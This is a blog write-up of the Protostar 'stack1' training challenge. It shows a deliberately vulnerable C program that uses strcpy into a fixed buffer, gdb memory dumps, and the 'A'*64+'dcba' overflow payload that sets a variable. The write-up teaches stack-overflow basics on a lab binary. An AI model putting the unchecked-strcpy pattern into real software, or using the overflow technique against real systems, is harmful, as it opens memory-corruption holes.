Depth of Code

Hani’s blog

exploit-exercises Protostar: Stack 1

Dec 9, 2012

This is the write-up for stack1 challenge of Exploit-Exercises’ Protostar wargame. The source code is provided as fellow:

#include <stdlib.h>

#include <unistd.h>

#include <stdio.h>

#include <string.h>

int main(int argc, char **argv)

{

volatile int modified;

char buffer[64];

if(argc == 1) {

errx(1, “please specify an argument\n”);

}

modified = 0;

strcpy(buffer, argv[1]);

if(modified == 0x61626364) {

printf(“you have correctly got the variable to the right value\n”);

} else {

printf(“Try again, you got 0x%08x\n”, modified);

}

}

Like the previous challenge, the task is to change the value of modified

variable. But this time, we have to set it up to a certain value: 0x61626364.

When looking at the ASCII table, you will see that these values are:

0x61 => a, 0x62 => b, 0x63 => c, 0x64 => d

user@protostar:~/stack1$ gdb -q /opt/protostar/bin/stack1
Reading symbols from /opt/protostar/bin/stack1…done.
(gdb) run `python -c “print ‘A’*64+‘abcd’”`
Starting program: /opt/protostar/bin/stack1 `python -c “print ‘A’*64+‘abcd’”`
Try again, you got 0x64636261

Program exited with code 036.

One small catch is that ‘abcd’ will be read as ‘dcba’. Why is that ? Simply

because we are directly altering data in memory and the x86 architecture is

little endian.

(gdb) break 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) run `python -c “print ‘A’*64+‘abcd’”`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack1 `python -c “print ‘A’*64+‘abcd’”`

Breakpoint 1, main (argc=2, argv=0xbffff814) at stack1/stack1.c:18
18    in stack1/stack1.c
(gdb) x/30wx $esp
0xbffff700:    0xbffff71c        0xbffff94e        0xb7fff8f8       0xb7f0186e
0xbffff710:    0xb7fd7ff4       0xb7ec6165    0xbffff728        0x41414141
0xbffff720:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff730:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff740:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff750:    0x41414141    0x41414141    0x41414141    0x64636261
0xbffff760:    0x08048400    0x00000000    0xbffff7e8        0xb7eadc76
0xbffff770:    0x00000002    0xbffff814 

With that said, in order to exploit this challenge, we use the value ‘dcba’ in our payload.

user@protostar:~$ /opt/protostar/bin/stack1 `python -c “print ‘A’*64+‘dcba’”`

you have correctly got the variable to the right value